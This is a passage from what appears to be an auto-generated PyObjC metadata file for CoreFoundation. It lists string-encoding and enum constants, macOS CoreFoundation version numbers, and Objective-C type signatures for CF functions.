gDOSRussian@1051$kCFStringEncodingDOSThai@1053$kCFStringEncodingDOSTurkish@1044$kCFStringEncodingEBCDIC_CP037@3074$kCFStringEncodingEBCDIC_US@3073$kCFStringEncodingEUC_CN@2352$kCFStringEncodingEUC_JP@2336$kCFStringEncodingEUC_KR@2368$kCFStringEncodingEUC_TW@2353$kCFStringEncodingGBK_95@1585$kCFStringEncodingGB_18030_2000@1586$kCFStringEncodingGB_2312_80@1584$kCFStringEncodingHZ_GB_2312@2565$kCFStringEncodingISOLatin1@513$kCFStringEncodingISOLat
in10@528$kCFStringEncodingISOLatin2@514$kCFStringEncodingISOLatin3@515$kCFStringEncodingISOLatin4@516$kCFStringEncodingISOLatin5@521$kCFStringEncodingISOLatin6@522$kCFStringEncodingISOLatin7@525$kCFStringEncodingISOLatin8@526$kCFStringEncodingISOLatin9@527$kCFStringEncodingISOLatinArabic@518$kCFStringEncodingISOLatinCyrillic@517$kCFStringEncodingISOLatinGreek@519$kCFStringEncodingISOLatinHebrew@520$kCFStringEncodingISOLatinThai@523$kCFStringEncodingISO_2022_CN@2096$kCFStringEncodingISO_2022_CN_EXT@2097$kCFStringEncodingISO_2022_JP@2080$kCFStringEncodingISO_2022_JP_1@2082$kCFStringEncodingISO_2022_JP_2@2081$kCFStringEncodingISO_2022_JP_3@2083$kCFStringEncodingISO_2022_KR@2112$kCFStringEncodingInvalidId@4294967295$kCFStringEncodingJIS_C6226_78@1572$kCFStringEncodingJIS_X0201_76@1568$kCFStringEncodingJIS_X0208_83@1569$kCFStringEncodingJIS_X0208_90@1570$kCFStringEncodingJIS_X0212_90@1571$kCFStringEncodingKOI8_R@2562$kCFStringEncodingKOI8_U@2568$kCFStringEncodingKSC_5601_87@1600$kCFStringEncodingKSC_5601_92_Johab@1601$kCFStringEncodingMacArabic@4$kCFStringEncodingMacArmenian@24$kCFStringEncodingMacBengali@13$kCFStringEncodingMacBurmese@19$kCFStringEncodingMacCeltic@39$kCFStringEncodingMacCentralEurRoman@29$kCFStringEncodingMacChineseSimp@25$kCFStringEncodingMacChineseTrad@2$kCFStringEncodingMacCroatian@36$kCFStringEncodingMacCyrillic@7$kCFStringEncodingMacDevanagari@9$kCFStringEncodingMacDingbats@34$kCFStringEncodingMacEthiopic@28$kCFStringEncodingMacExtArabic@31$kCFStringEncodingMacFarsi@140$kCFStringEncodingMacGaelic@40$kCFStringEncodingMacGeorgian@23$kCFStringEncodingMacGreek@6$kCFStringEncodingMacGujarati@11$kCFStringEncodingMacGurmukhi@10$kCFStringEncodingMacHFS@255$kCFStringEncodingMacHebrew@5$kCFStringEncodingMacIcelandic@37$kCFStringEncodingMacInuit@236$kCFStringEncodingMacJapanese@1$kCFStringEncodingMacKannada@16$kCFStringEncodingMacKhmer@20$kCFStringEncodingMacKorean@3$kCFStringEncodingMacLaotian@22$kCFStringEncodingMacMalayalam@17$kCFStringEncodingMacMongolian
@27$kCFStringEncodingMacOriya@12$kCFStringEncodingMacRoman@0$kCFStringEncodingMacRomanLatin1@2564$kCFStringEncodingMacRomanian@38$kCFStringEncodingMacSinhalese@18$kCFStringEncodingMacSymbol@33$kCFStringEncodingMacTamil@14$kCFStringEncodingMacTelugu@15$kCFStringEncodingMacThai@21$kCFStringEncodingMacTibetan@26$kCFStringEncodingMacTurkish@35$kCFStringEncodingMacUkrainian@152$kCFStringEncodingMacVT100@252$kCFStringEncodingMacVietnamese@30$kCFStringEncodingNextStepJapanese@2818$kCFStringEncodingNextStepLatin@2817$kCFStringEncodingNonLossyASCII@3071$kCFStringEncodingShiftJIS@2561$kCFStringEncodingShiftJIS_X0213@1576$kCFStringEncodingShiftJIS_X0213_00@1576$kCFStringEncodingShiftJIS_X0213_MenKuTen@1577$kCFStringEncodingUTF16@256$kCFStringEncodingUTF16BE@268435712$kCFStringEncodingUTF16LE@335544576$kCFStringEncodingUTF32@201326848$kCFStringEncodingUTF32BE@402653440$kCFStringEncodingUTF32LE@469762304$kCFStringEncodingUTF7@67109120$kCFStringEncodingUTF7_IMAP@2576$kCFStringEncodingUTF8@134217984$kCFStringEncodingUnicode@256$kCFStringEncodingVISCII@2567$kCFStringEncodingWindowsArabic@1286$kCFStringEncodingWindowsBalticRim@1287$kCFStringEncodingWindowsCyrillic@1282$kCFStringEncodingWindowsGreek@1283$kCFStringEncodingWindowsHebrew@1285$kCFStringEncodingWindowsKoreanJohab@1296$kCFStringEncodingWindowsLatin1@1280$kCFStringEncodingWindowsLatin2@1281$kCFStringEncodingWindowsLatin5@1284$kCFStringEncodingWindowsVietnamese@1288$kCFStringNormalizationFormC@2$kCFStringNormalizationFormD@0$kCFStringNormalizationFormKC@3$kCFStringNormalizationFormKD@1$kCFStringTokenizerAttributeLanguage@131072$kCFStringTokenizerAttributeLatinTranscription@65536$kCFStringTokenizerTokenHasDerivedSubTokensMask@4$kCFStringTokenizerTokenHasHasNumbersMask@8$kCFStringTokenizerTokenHasNonLettersMask@16$kCFStringTokenizerTokenHasSubTokensMask@2$kCFStringTokenizerTokenIsCJWordMask@32$kCFStringTokenizerTokenNone@0$kCFStringTokenizerTokenNormal@1$kCFStringTokenizerUnitLineBreak@3$kCFStringTokenizerUnitParagraph@2$kCFSt
ringTokenizerUnitSentence@1$kCFStringTokenizerUnitWord@0$kCFStringTokenizerUnitWordBoundary@4$kCFTimeZoneNameStyleDaylightSaving@2$kCFTimeZoneNameStyleGeneric@4$kCFTimeZoneNameStyleShortDaylightSaving@3$kCFTimeZoneNameStyleShortGeneric@5$kCFTimeZoneNameStyleShortStandard@1$kCFTimeZoneNameStyleStandard@0$kCFURLBookmarkCreationMinimalBookmarkMask@512$kCFURLBookmarkCreationPreferFileIDResolutionMask@256$kCFURLBookmarkCreationSecurityScopeAllowOnlyReadAccess@4096$kCFURLBookmarkCreationSuitableForBookmarkFile@1024$kCFURLBookmarkCreationWithSecurityScope@2048$kCFURLBookmarkResolutionWithSecurityScope@1024$kCFURLBookmarkResolutionWithoutMountingMask@512$kCFURLBookmarkResolutionWithoutUIMask@256$kCFURLComponentFragment@12$kCFURLComponentHost@8$kCFURLComponentNetLocation@2$kCFURLComponentParameterString@10$kCFURLComponentPassword@6$kCFURLComponentPath@3$kCFURLComponentPort@9$kCFURLComponentQuery@11$kCFURLComponentResourceSpecifier@4$kCFURLComponentScheme@1$kCFURLComponentUser@5$kCFURLComponentUserInfo@7$kCFURLEnumeratorDefaultBehavior@0$kCFURLEnumeratorDescendRecursively@1$kCFURLEnumeratorDirectoryPostOrderSuccess@4$kCFURLEnumeratorEnd@2$kCFURLEnumeratorError@3$kCFURLEnumeratorGenerateFileReferenceURLs@4$kCFURLEnumeratorGenerateRelativePathURLs@64$kCFURLEnumeratorIncludeDirectoriesPostOrder@32$kCFURLEnumeratorIncludeDirectoriesPreOrder@16$kCFURLEnumeratorSkipInvisibles@2$kCFURLEnumeratorSkipPackageContents@8$kCFURLEnumeratorSuccess@1$kCFURLHFSPathStyle@1$kCFURLImproperArgumentsError@-15$kCFURLPOSIXPathStyle@0$kCFURLPropertyKeyUnavailableError@-17$kCFURLRemoteHostUnavailableError@-14$kCFURLResourceAccessViolationError@-13$kCFURLResourceNotFoundError@-12$kCFURLTimeoutError@-18$kCFURLUnknownError@-10$kCFURLUnknownPropertyKeyError@-16$kCFURLUnknownSchemeError@-11$kCFURLWindowsPathStyle@2$kCFUserNotificationAlternateResponse@1$kCFUserNotificationCancelResponse@3$kCFUserNotificationCautionAlertLevel@2$kCFUserNotificationDefaultResponse@0$kCFUserNotificationNoDefaultButtonFlag@32$k
CFUserNotificationNoteAlertLevel@1$kCFUserNotificationOtherResponse@2$kCFUserNotificationPlainAlertLevel@3$kCFUserNotificationStopAlertLevel@0$kCFUserNotificationUseRadioButtonsFlag@64$kCFXMLEntityTypeCharacter@4$kCFXMLEntityTypeParameter@0$kCFXMLEntityTypeParsedExternal@2$kCFXMLEntityTypeParsedInternal@1$kCFXMLEntityTypeUnparsed@3$kCFXMLErrorElementlessDocument@11$kCFXMLErrorEncodingConversionFailure@3$kCFXMLErrorMalformedCDSect@7$kCFXMLErrorMalformedCharacterReference@13$kCFXMLErrorMalformedCloseTag@8$kCFXMLErrorMalformedComment@12$kCFXMLErrorMalformedDTD@5$kCFXMLErrorMalformedDocument@10$kCFXMLErrorMalformedName@6$kCFXMLErrorMalformedParsedCharacterData@14$kCFXMLErrorMalformedProcessingInstruction@4$kCFXMLErrorMalformedStartTag@9$kCFXMLErrorNoData@15$kCFXMLErrorUnexpectedEOF@1$kCFXMLErrorUnknownEncoding@2$kCFXMLNodeCurrentVersion@1$kCFXMLNodeTypeAttribute@3$kCFXMLNodeTypeAttributeListDeclaration@15$kCFXMLNodeTypeCDATASection@7$kCFXMLNodeTypeComment@5$kCFXMLNodeTypeDocument@1$kCFXMLNodeTypeDocumentFragment@8$kCFXMLNodeTypeDocumentType@11$kCFXMLNodeTypeElement@2$kCFXMLNodeTypeElementTypeDeclaration@14$kCFXMLNodeTypeEntity@9$kCFXMLNodeTypeEntityReference@10$kCFXMLNodeTypeNotation@13$kCFXMLNodeTypeProcessingInstruction@4$kCFXMLNodeTypeText@6$kCFXMLNodeTypeWhitespace@12$kCFXMLParserAddImpliedAttributes@32$kCFXMLParserAllOptions@16777215$kCFXMLParserNoOptions@0$kCFXMLParserReplacePhysicalEntities@4$kCFXMLParserResolveExternalEntities@16$kCFXMLParserSkipMetaData@2$kCFXMLParserSkipWhitespace@8$kCFXMLParserValidateDocument@1$kCFXMLStatusParseInProgress@-1$kCFXMLStatusParseNotBegun@-2$kCFXMLStatusParseSuccessful@0$"""
# Register the kCFCoreFoundationVersionNumber* constants: the value of the
# CoreFoundation framework's version number for each macOS release
# (e.g. 10.6 shipped CF 550.0). Code compares the runtime
# kCFCoreFoundationVersionNumber against these to detect the OS version.
# NOTE(review): this file looks machine-generated (PyObjC framework
# metadata); `misc` is presumably the module-level metadata dict populated
# earlier in the file — confirm before hand-editing any entries.
misc.update(
    {
        "kCFCoreFoundationVersionNumber10_7_1": 635.0,
        "kCFCoreFoundationVersionNumber10_4_4_Intel": 368.26,
        "kCFCoreFoundationVersionNumber10_11_4": 1258.1,
        "kCFCoreFoundationVersionNumber10_11_3": 1256.14,
        "kCFCoreFoundationVersionNumber10_11_2": 1256.14,
        "kCFCoreFoundationVersionNumber10_11_1": 1255.1,
        "kCFCoreFoundationVersionNumber10_10_4": 1153.18,
        "kCFCoreFoundationVersionNumber10_10_5": 1153.18,
        "kCFCoreFoundationVersionNumber10_10_3": 1153.18,
        "kCFCoreFoundationVersionNumber10_10_1": 1151.16,
        "kCFCoreFoundationVersionNumber10_8_2": 744.12,
        "kCFCoreFoundationVersionNumber10_8_3": 744.18,
        "kCFCoreFoundationVersionNumber10_8_1": 744.0,
        "kCFCoreFoundationVersionNumber10_5_1": 476.0,
        "kCFCoreFoundationVersionNumber10_8_4": 744.19,
        "kCFCoreFoundationVersionNumber10_9_2": 855.14,
        "kCFCoreFoundationVersionNumber10_9_1": 855.11,
        "kCFCoreFoundationVersionNumber10_4_7": 368.27,
        "kCFCoreFoundationVersionNumber10_4_4_PowerPC": 368.25,
        "kCFCoreFoundationVersionNumber10_4_2": 368.11,
        "kCFCoreFoundationVersionNumber10_4_3": 368.18,
        "kCFCoreFoundationVersionNumber10_4_1": 368.1,
        "kCFCoreFoundationVersionNumber10_5_7": 476.18,
        "kCFCoreFoundationVersionNumber10_5_6": 476.17,
        "kCFCoreFoundationVersionNumber10_5_5": 476.15,
        "kCFCoreFoundationVersionNumber10_5_4": 476.14,
        "kCFCoreFoundationVersionNumber10_5_3": 476.13,
        "kCFCoreFoundationVersionNumber10_5_2": 476.1,
        "kCFCoreFoundationVersionNumber10_4_8": 368.27,
        "kCFCoreFoundationVersionNumber10_4_9": 368.28,
        "kCFCoreFoundationVersionNumber10_2_4": 263.3,
        "kCFCoreFoundationVersionNumber10_2_5": 263.5,
        "kCFCoreFoundationVersionNumber10_2_6": 263.5,
        "kCFCoreFoundationVersionNumber10_2_7": 263.5,
        "kCFCoreFoundationVersionNumber10_3_9": 299.35,
        "kCFCoreFoundationVersionNumber10_2_1": 263.1,
        "kCFCoreFoundationVersionNumber10_2_2": 263.1,
        "kCFCoreFoundationVersionNumber10_2_3": 263.3,
        "kCFCoreFoundationVersionNumber10_3_5": 299.31,
        "kCFCoreFoundationVersionNumber10_3_4": 299.31,
        "kCFCoreFoundationVersionNumber10_3_7": 299.33,
        "kCFCoreFoundationVersionNumber10_3_6": 299.32,
        "kCFCoreFoundationVersionNumber10_3_1": 299.0,
        "kCFCoreFoundationVersionNumber10_3_3": 299.3,
        "kCFCoreFoundationVersionNumber10_3_2": 299.0,
        "kCFCoreFoundationVersionNumber10_1_3": 227.2,
        "kCFCoreFoundationVersionNumber10_1_2": 227.2,
        "kCFCoreFoundationVersionNumber10_1_1": 226.0,
        "kCFCoreFoundationVersionNumber10_1_4": 227.3,
        "kCFCoreFoundationVersionNumber10_4_6_PowerPC": 368.25,
        "kCFCoreFoundationVersionNumber10_6_2": 550.13,
        "kCFCoreFoundationVersionNumber10_6_3": 550.19,
        "kCFCoreFoundationVersionNumber10_6_4": 550.29,
        "kCFCoreFoundationVersionNumber10_6_5": 550.42,
        "kCFCoreFoundationVersionNumber10_6_6": 550.42,
        "kCFCoreFoundationVersionNumber10_6_7": 550.42,
        "kCFCoreFoundationVersionNumber10_6_8": 550.43,
        "kCFCoreFoundationVersionNumber10_0_3": 196.5,
        "kCFCoreFoundationVersionNumber10_7_3": 635.19,
        "kCFCoreFoundationVersionNumber10_7_2": 635.15,
        "kCFCoreFoundationVersionNumber10_4_10": 368.28,
        "kCFCoreFoundationVersionNumber10_7_4": 635.21,
        "kCFCoreFoundationVersionNumber10_4_5_PowerPC": 368.25,
        "kCFCoreFoundationVersionNumber10_3_8": 299.33,
        "kCFCoreFoundationVersionNumber10_10": 1151.16,
        "kCFCoreFoundationVersionNumber10_4_5_Intel": 368.26,
        "kCFCoreFoundationVersionNumber10_2_8": 263.5,
        "kCFCoreFoundationVersionNumber10_5_8": 476.19,
        "kCFCoreFoundationVersionNumber10_4_11": 368.31,
        "kCFCoreFoundationVersionNumber10_6_1": 550.0,
        # Entries without a patch suffix (e.g. ..._10_8) are the version
        # number of that release's initial (x.y.0) build.
        "kCFCoreFoundationVersionNumber10_8": 744.0,
        "kCFCoreFoundationVersionNumber10_5": 476.0,
        "kCFCoreFoundationVersionNumber10_4": 368.0,
        "kCFCoreFoundationVersionNumber10_7": 635.0,
        "kCFCoreFoundationVersionNumber10_6": 550.0,
        "kCFCoreFoundationVersionNumber10_1": 226.0,
        "kCFCoreFoundationVersionNumber10_0": 196.4,
        "kCFCoreFoundationVersionNumber10_3": 299.0,
        "kCFCoreFoundationVersionNumber10_2": 263.0,
        "kCFCoreFoundationVersionNumber10_7_5": 635.21,
        "kCFCoreFoundationVersionNumber10_9": 855.11,
        "kCFCoreFoundationVersionNumber10_4_6_Intel": 368.26,
    }
)
functions = {
"CFURLCreateByResolvingBookmarkData": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^{__CFData=}L^{__CFURL=}^{__CFArray=}^Z^^{__CFError=}",
b"^{__CFURL=}^{__CFAllocator=}^{__CFData=}Q^{__CFURL=}^{__CFArray=}^Z^^{__CFError=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
5: {"type_modifier": "o"},
6: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
},
},
),
"CFConvertDoubleSwappedToHost": (b"d{_CFSwappedFloat64=Q}",),
"CFURLCreateCopyAppendingPathComponent": (
b"^{__CFURL=}^{__CFAllocator=}^{__CFURL=}^{__CFString=}Z",
"",
{"retval": {"already_cfretained": True}},
),
"CFRangeMake": (sel32or64(b"{_CFRange=ll}ll", b"{_CFRange=qq}qq"),),
"CFBitVectorGetCount": (sel32or64(b"l^{__CFBitVector=}", b"q^{__CFBitVector=}"),),
"CFDictionaryContainsKey": (b"Z^{__CFDictionary=}@",),
"CFPreferencesCopyValue": (
b"@^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFGetAllocator": (b"^{__CFAllocator=}@",),
"CFSetCreateMutable": (
sel32or64(
b"^{__CFSet=}^{__CFAllocator=}l^{_CFSetCallBacks=l^?^?^?^?^?}",
b"^{__CFSet=}^{__CFAllocator=}q^{_CFSetCallBacks=q^?^?^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorGetCode": (sel32or64(b"l^{__CFError=}", b"q^{__CFError=}"),),
"CFStringGetFileSystemRepresentation": (
sel32or64(b"Z^{__CFString=}^tl", b"Z^{__CFString=}^tq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "o"}}},
),
"CFLocaleGetTypeID": (sel32or64(b"L", b"Q"),),
"CFUUIDGetUUIDBytes": (b"{_CFUUIDBytes=CCCCCCCCCCCCCCCC}^{__CFUUID=}",),
"CFDateFormatterCreateDateFormatFromTemplate": (
sel32or64(
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}L^{__CFLocale=}",
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}Q^{__CFLocale=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFTreeInsertSibling": (b"v^{__CFTree=}^{__CFTree=}",),
"CFSocketConnectToAddress": (
sel32or64(b"l^{__CFSocket=}^{__CFData=}d", b"q^{__CFSocket=}^{__CFData=}d"),
),
"CFWriteStreamScheduleWithRunLoop": (
b"v^{__CFWriteStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFDateFormatterCreateStringWithAbsoluteTime": (
b"^{__CFString=}^{__CFAllocator=}^{__CFDateFormatter=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFReadStreamScheduleWithRunLoop": (
b"v^{__CFReadStream=}^{__CFRunLoop=}^{__CFString=}",
),
"CFArrayAppendValue": (b"v^{__CFArray=}@",),
"CFSetRemoveValue": (b"v^{__CFSet=}@",),
"CFBundleCopyPrivateFrameworksURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBitVectorCreateMutable": (
sel32or64(
b"^{__CFBitVector=}^{__CFAllocator=}l",
b"^{__CFBitVector=}^{__CFAllocator=}q",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCreateCanonicalLocaleIdentifierFromString": (
b"^{__CFString=}^{__CFAllocator=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringTokenizerCopyBestStringLanguage": (
sel32or64(
b"^{__CFString=}^{__CFString=}{_CFRange=ll}",
b"^{__CFString=}^{__CFString=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFUUIDCreate": (
b"^{__CFUUID=}^{__CFAllocator=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetRangeOfUnit": (
sel32or64(
b"{_CFRange=ll}^{__CFCalendar=}LLd", b"{_CFRange=qq}^{__CFCalendar=}QQd"
),
),
"CFStringFindWithOptionsAndLocale": (
sel32or64(
b"Z^{__CFString=}^{__CFString=}{_CFRange=ll}L^{__CFLocale=}^{_CFRange=ll}",
b"Z^{__CFString=}^{__CFString=}{_CFRange=qq}Q^{__CFLocale=}^{_CFRange=qq}",
),
"",
{"arguments": {5: {"type_modifier": "o"}}},
),
"CFURLSetResourcePropertyForKey": (
b"Z^{__CFURL=}^{__CFString=}@^^{__CFError=}",
"",
{
"arguments": {
3: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
}
},
),
"CFFileSecurityCopyOwnerUUID": (
b"Z^{__CFFileSecurity=}^^{__CFUUID=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"type_modifier": "o"}},
},
),
"CFCalendarAddComponents": (
sel32or64(b"Z^{__CFCalendar=}^dL^c", b"Z^{__CFCalendar=}^dQ^c"),
"",
{"variadic": True},
),
"CFLocaleCopyCommonISOCurrencyCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetOrdinalityOfUnit": (
sel32or64(b"l^{__CFCalendar=}LLd", b"q^{__CFCalendar=}QQd"),
),
"CFPreferencesRemoveSuitePreferencesFromApp": (b"v^{__CFString=}^{__CFString=}",),
"CFCalendarGetMinimumDaysInFirstWeek": (
sel32or64(b"l^{__CFCalendar=}", b"q^{__CFCalendar=}"),
),
"CFURLCreateWithFileSystemPathRelativeToBase": (
sel32or64(
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}lZ^{__CFURL=}",
b"^{__CFURL=}^{__CFAllocator=}^{__CFString=}qZ^{__CFURL=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFBinaryHeapGetCountOfValue": (
sel32or64(b"l^{__CFBinaryHeap=}@", b"q^{__CFBinaryHeap=}@"),
),
"CFStringIsSurrogateLowCharacter": (b"ZT",),
"CFStringTrim": (b"v^{__CFString=}^{__CFString=}",),
"CFXMLNodeGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringSetExternalCharactersNoCopy": (
sel32or64(b"v^{__CFString=}^Tll", b"v^{__CFString=}^Tqq"),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 3, "type_modifier": "n"}},
},
),
"CFLocaleGetSystem": (b"^{__CFLocale=}",),
"CFDataGetLength": (sel32or64(b"l^{__CFData=}", b"q^{__CFData=}"),),
"CFWriteStreamWrite": (
sel32or64(b"l^{__CFWriteStream=}^vl", b"q^{__CFWriteStream=}^vq"),
"",
{"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}}},
),
"CFBundleGetVersionNumber": (sel32or64(b"L^{__CFBundle=}", b"I^{__CFBundle=}"),),
"CFGetRetainCount": (sel32or64(b"l@", b"q@"),),
"CFRunLoopObserverGetContext": (
sel32or64(
b"v^{__CFRunLoopObserver=}^{_CFRunLoopObserverContext=l^v^?^?^?}",
b"v^{__CFRunLoopObserver=}^{_CFRunLoopObserverContext=q^v^?^?^?}",
),
),
"CFDataCreateWithBytesNoCopy": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}^vl^{__CFAllocator=}",
b"^{__CFData=}^{__CFAllocator=}^vq^{__CFAllocator=}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {1: {"c_array_length_in_arg": 2, "type_modifier": "n"}},
},
),
"CFURLEnumeratorGetNextURL": (
sel32or64(
b"l^{__CFURLEnumerator=}^^{__CFURL=}^^{__CFError=}",
b"q^{__CFURLEnumerator=}^^{__CFURL=}^^{__CFError=}",
),
"",
{
"arguments": {
1: {"type_modifier": "o"},
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
},
}
},
),
"CFRunLoopTimerGetTypeID": (sel32or64(b"L", b"Q"),),
"CFStringConvertNSStringEncodingToEncoding": (sel32or64(b"LL", b"IQ"),),
"CFURLCreateBookmarkDataFromFile": (
b"^{__CFData=}^{__CFAllocator=}^{__CFURL=}^^{__CFError=}",
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"already_cfretained": True,
"type_modifier": "o",
"null_accepted": True,
}
},
},
),
"CFBundleCopyResourceURLForLocalization": (
b"^{__CFURL=}^{__CFBundle=}^{__CFString=}^{__CFString=}^{__CFString=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFStringGetMaximumSizeForEncoding": (sel32or64(b"llL", b"qqI"),),
"CFStringTransform": (
sel32or64(
b"Z^{__CFString=}^{_CFRange=ll}^{__CFString=}Z",
b"Z^{__CFString=}^{_CFRange=qq}^{__CFString=}Z",
),
"",
{"arguments": {1: {"type_modifier": "N"}}},
),
"CFURLStopAccessingSecurityScopedResource": (b"v^{__CFURL=}",),
"CFDataCreateMutableCopy": (
sel32or64(
b"^{__CFData=}^{__CFAllocator=}l^{__CFData=}",
b"^{__CFData=}^{__CFAllocator=}q^{__CFData=}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFMachPortGetContext": (
sel32or64(
b"v^{__CFMachPort=}^{_CFMachPortContext=l^v^?^?^?}",
b"v^{__CFMachPort=}^{_CFMachPortContext=q^v^?^?^?}",
),
),
"CFDateFormatterGetDateStyle": (
sel32or64(b"l^{__CFDateFormatter=}", b"q^{__CFDateFormatter=}"),
),
"CFStringGetHyphenationLocationBeforeIndex": (
sel32or64(
b"l^{__CFString=}l{_CFRange=ll}L^{__CFLocale=}^L",
b"q^{__CFString=}q{_CFRange=qq}Q^{__CFLocale=}^I",
),
"",
{"arguments": {5: {"type_modifier": "o"}}},
),
"CFRunLoopIsWaiting": (b"Z^{__CFRunLoop=}",),
"CFAttributedStringReplaceString": (
sel32or64(
b"v^{__CFAttributedString=}{_CFRange=ll}^{__CFString=}",
b"v^{__CFAttributedString=}{_CFRange=qq}^{__CFString=}",
),
),
"CFSocketCreateWithNative": (
sel32or64(
b"^{__CFSocket=}^{__CFAllocator=}iL^?^{_CFSocketContext=l^v^?^?^?}",
b"^{__CFSocket=}^{__CFAllocator=}iQ^?^{_CFSocketContext=q^v^?^?^?}",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
3: {
"callable": {
"retval": {"type": b"v"},
"arguments": {
0: {"type": b"^{__CFSocket=}"},
1: {"type": b"Q"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
4: {"type": b"^v"},
},
}
}
},
},
),
"CFMessagePortCreateLocal": (
sel32or64(
b"^{__CFMessagePort=}^{__CFAllocator=}^{__CFString=}^?^{_CFMessagePortContext=l^v^?^?^?}^Z",
b"^{__CFMessagePort=}^{__CFAllocator=}^{__CFString=}^?^{_CFMessagePortContext=q^v^?^?^?}^Z",
),
"",
{
"retval": {"already_cfretained": True},
"arguments": {
2: {
"callable": {
"retval": {"type": b"^{__CFData=}"},
"arguments": {
0: {"type": b"^{__CFMessagePort=}"},
1: {"type": b"i"},
2: {"type": b"^{__CFData=}"},
3: {"type": b"^v"},
},
}
}
},
},
),
"CFTimeZoneCopyDefault": (
b"^{__CFTimeZone=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFArrayGetValueAtIndex": (sel32or64(b"@^{__CFArray=}l", b"@^{__CFArray=}q"),),
"CFErrorCopyFailureReason": (
b"^{__CFString=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBinaryHeapContainsValue": (b"Z^{__CFBinaryHeap=}@",),
"CFNumberFormatterGetStyle": (
sel32or64(b"l^{__CFNumberFormatter=}", b"q^{__CFNumberFormatter=}"),
),
"CFXMLParserCreate": (
sel32or64(
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Ll^{_CFXMLParserCallBacks=l^?^?^?^?^?}^{_CFXMLParserContext=l^v^?^?^?}",
b"^{__CFXMLParser=}^{__CFAllocator=}^{__CFData=}^{__CFURL=}Qq^{_CFXMLParserCallBacks=q^?^?^?^?^?}^{_CFXMLParserContext=q^v^?^?^?}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFLocaleCopyPreferredLanguages": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFBagCreateCopy": (
b"^{__CFBag=}^{__CFAllocator=}^{__CFBag=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFNotificationCenterGetDistributedCenter": (b"^{__CFNotificationCenter=}",),
"CFXMLTreeGetNode": (b"^{__CFXMLNode=}^{__CFTree=}",),
"CFDateCreate": (
b"^{__CFDate=}^{__CFAllocator=}d",
"",
{"retval": {"already_cfretained": True}},
),
"CFErrorCopyDescription": (
b"^{__CFString=}^{__CFError=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCharacterSetGetTypeID": (sel32or64(b"L", b"Q"),),
"CFWriteStreamCopyProperty": (
b"@^{__CFWriteStream=}^{__CFString=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringGetLength": (
sel32or64(b"l^{__CFAttributedString=}", b"q^{__CFAttributedString=}"),
),
"CFStringGetCStringPtr": (
sel32or64(b"^t@L", b"^t@I"),
"",
{"retval": {"c_array_delimited_by_null": True}},
),
"CFFileDescriptorEnableCallBacks": (
sel32or64(b"v^{__CFFileDescriptor=}L", b"v^{__CFFileDescriptor=}Q"),
),
"CFURLGetString": (b"^{__CFString=}^{__CFURL=}",),
"CFReadStreamSetProperty": (b"Z^{__CFReadStream=}^{__CFString=}@",),
"CFFileDescriptorInvalidate": (b"v^{__CFFileDescriptor=}",),
"CFBagGetCountOfValue": (sel32or64(b"l^{__CFBag=}@", b"q^{__CFBag=}@"),),
"CFAbsoluteTimeGetCurrent": (b"d",),
"CFLocaleCopyISOCurrencyCodes": (
b"^{__CFArray=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFCalendarGetTypeID": (sel32or64(b"L", b"Q"),),
"CFBundleCopySharedFrameworksURL": (
b"^{__CFURL=}^{__CFBundle=}",
"",
{"retval": {"already_cfretained": True}},
),
"CFAttributedStringCreateWithSubstring": (
sel32or64(
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFAttributedString=}{_CFRange=ll}",
b"^{__CFAttributedString=}^{__CFAllocator=}^{__CFAttributedString=}{_CFRange=qq}",
),
"",
{"retval": {"already_cfretained": True}},
),
"CFStringAppend": (b"v^{__CFString=}^{__CFString=}",),
"CFRelease": (b"v@",),
"CFAllocatorGetDefault": (b"^{__CFAllocator=}",),
"CFStringTokenizerAdvanceToNextToken": (
sel32or64(b"L^{__CFStringTokenizer=}", b"Q^{__CFStringTokenizer=}"),
),
"CFAttributedStringGetAttributeAndLongestEffectiveRange": (
sel32or64(
b"@^{__CFAttributedString=}l^{__CFString=}{_CFRange=ll}^{_CFRange=ll}",
